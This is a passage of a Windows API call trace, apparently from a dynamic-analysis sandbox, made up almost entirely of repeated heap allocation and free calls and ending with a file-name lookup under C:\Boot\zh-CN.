hFindFile=0x32ef1f8) returned 1 [0200.937] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0200.937] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.937] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.937] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.937] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.937] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.937] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.937] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.937] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.937] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.937] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.937] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.937] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.937] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.938] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.938] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.938] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.938] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.938] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.938] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.938] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.938] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.938] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.938] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.938] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.938] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.938] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.938] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b65058 [0200.938] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.938] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.938] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.938] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.938] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.938] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.938] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.938] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.938] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.938] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.938] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.938] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.938] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.939] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.939] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.939] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.939] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.939] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.939] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.939] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.939] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.939] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.939] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.939] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.939] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.939] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.939] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.939] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.939] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.939] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.939] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.939] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.939] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.939] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.939] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.939] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.939] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.939] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.939] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.939] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.939] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.939] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.939] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.939] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.939] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.940] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.940] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.940] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.940] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.940] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.940] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.940] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.940] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.940] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.940] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.940] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.940] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b25070 [0200.940] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0200.940] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.940] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.940] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.940] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.940] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.940] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.940] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.940] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0200.940] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.940] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.940] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.940] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.940] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.940] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.940] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.940] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.940] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.940] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b65058 [0200.940] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.940] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.941] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.941] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.941] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.941] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.941] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.941] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.941] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.941] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.941] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.941] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.941] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.941] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.941] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.941] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.941] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.941] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.941] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.941] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.941] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.941] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0200.941] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.941] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.941] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.941] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.941] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.941] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.941] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.941] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.941] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.941] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.941] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.941] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.942] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.942] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.942] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.942] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.942] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.942] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.942] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.942] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.942] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.942] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.942] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.942] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.942] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.942] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.942] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.942] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.942] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.942] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.942] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.942] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.942] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.942] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.942] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.942] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.942] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.942] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.942] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.942] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.942] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b25070 [0200.942] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0200.942] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0200.943] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.943] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.943] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.943] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.943] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.943] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.943] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.943] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.943] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.943] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.943] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.943] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.943] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.943] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.943] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.943] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.943] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.943] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.943] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.943] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.943] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.943] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.943] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.943] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.943] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0200.943] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.944] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.944] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.944] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.944] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.944] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.944] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.944] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.944] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.944] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.944] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.944] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.944] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.944] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.944] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.944] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.944] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.944] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.944] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.944] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.944] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.944] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.944] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.944] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.944] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.944] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.944] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.944] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.944] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.945] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.945] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.945] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.945] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.945] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.945] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.945] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.945] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.945] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.945] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.945] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.945] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b25070 [0200.945] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0200.945] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0200.945] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.945] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.945] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.945] PathFindFileNameW (pszPath="C:\\Boot\\zh-CN\\") returned="zh-CN\\" [0200.945] 